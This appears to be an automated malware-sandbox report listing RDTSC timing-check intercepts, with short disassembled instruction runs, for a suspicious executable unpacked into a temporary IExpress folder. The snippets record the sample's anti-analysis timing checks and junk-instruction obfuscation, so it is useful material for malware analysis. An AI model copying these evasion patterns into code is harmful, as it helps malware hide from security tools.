Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF987E second address: FF9894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4E3C536591h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF9894 second address: FF98DC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4E3CF4808Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E3CF48097h 0x00000011 je 00007F4E3CF4809Fh 0x00000017 jmp 00007F4E3CF48093h 0x0000001c jbe 00007F4E3CF48086h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF98DC second address: FF98E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4E3C536586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF98E8 second address: FF98EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF9E5D second address: FF9E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C536590h 0x00000009 jmp 00007F4E3C536590h 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4E3C536590h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF9E96 second address: FF9EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4E3CF48086h 0x0000000a js 00007F4E3CF48086h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF9EA6 second address: FF9EBD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4E3C536586h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F4E3C536586h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FFA12B second address: FFA140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48091h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1001EBB second address: 1001EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1002033 second address: 1002037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1002309 second address: 100230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100230E second address: 100231D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100231D second address: 1002324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1002324 second address: 1002335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3CF4808Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1002335 second address: 1002339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1002A9D second address: 1002AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F4E3CF48086h 0x00000009 jns 00007F4E3CF48086h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4E3CF48094h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100A1BE second address: 100A1C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100A1C4 second address: 100A1CE instructions: 0x00000000 rdtsc 0x00000002 js 00007F4E3CF4808Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100A301 second address: 100A327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4E3C536592h 0x0000000f jne 00007F4E3C536586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100A327 second address: 100A366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F4E3CF4808Bh 0x0000000e jc 00007F4E3CF48086h 0x00000014 popad 0x00000015 popad 0x00000016 jc 00007F4E3CF480A9h 0x0000001c push edi 0x0000001d jmp 00007F4E3CF4808Dh 0x00000022 jns 00007F4E3CF48086h 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007F4E3CF48086h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100B279 second address: 100B281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100B9C4 second address: 100B9CE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4E3CF48086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100B9CE second address: 100B9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F4E3C53658Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F4E3C536586h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100DDAE second address: 100DDDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4E3CF48092h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100F61A second address: 100F652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536597h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F4E3C53658Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F4E3C536586h 0x00000019 ja 00007F4E3C536586h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100F4D3 second address: 100F4D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 100F4D7 second address: 100F4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1013ECA second address: 1013EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F4E3CF48091h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 101FB8E second address: 101FB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 101F745 second address: 101F74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 101F74F second address: 101F757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1021DB2 second address: 1021DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 10295AD second address: 10295B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103354F second address: 1033565 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4E3CF48090h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103A738 second address: 103A73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103A73E second address: 103A743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039332 second address: 1039336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039336 second address: 1039342 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039342 second address: 1039346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 10394B9 second address: 10394BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 10394BE second address: 10394C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 10394C7 second address: 10394D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4E3CF48086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 10394D1 second address: 10394E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F4E3C536586h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039640 second address: 1039687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F4E3CF48099h 0x0000000c jmp 00007F4E3CF48091h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F4E3CF4808Eh 0x00000019 jmp 00007F4E3CF48097h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039687 second address: 103968C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103968C second address: 1039694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039694 second address: 1039698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1039698 second address: 103969C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103993B second address: 1039940 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103E887 second address: 103E890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103E890 second address: 103E8B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4E3C536586h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4E3C536591h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103E8B1 second address: 103E8B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103E8B5 second address: 103E8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103EA2C second address: 103EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 103EA32 second address: 103EA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F4E3C536586h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1042065 second address: 1042070 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1041F04 second address: 1041F1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536593h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1041F1B second address: 1041F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 104D13B second address: 104D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 104D13F second address: 104D143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 104D143 second address: 104D150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 104F58F second address: 104F59E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4E3CF48086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 104F59E second address: 104F5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 104F5A6 second address: 104F5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F4A164 second address: F4A168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F4A168 second address: F4A17C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F4A17C second address: F4A18B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4E3C53658Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F4A18B second address: F4A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F4A193 second address: F4A1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4E3C536586h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 106234E second address: 1062356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1062356 second address: 106236D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F4E3C536591h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1063E35 second address: 1063E3F instructions: 0x00000000 rdtsc 0x00000002 js 00007F4E3CF48086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107BF46 second address: 107BF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107BF4B second address: 107BF55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4E3CF48086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107AE03 second address: 107AE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107AE09 second address: 107AE31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Ah 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e jo 00007F4E3CF48086h 0x00000014 pop edi 0x00000015 jng 00007F4E3CF48092h 0x0000001b jnc 00007F4E3CF48086h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107AE31 second address: 107AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007F4E3C536586h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107B7DD second address: 107B7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107B7E5 second address: 107B7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 jnl 00007F4E3C536586h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107B96F second address: 107B98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4E3CF48086h 0x0000000a popad 0x0000000b jmp 00007F4E3CF4808Ah 0x00000010 pushad 0x00000011 jl 00007F4E3CF48086h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107E863 second address: 107E876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C53658Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107E876 second address: 107E87D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107E87D second address: 107E89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4E3C536593h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107EB71 second address: 107EB77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107EC46 second address: 107EC5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F4E3C536588h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
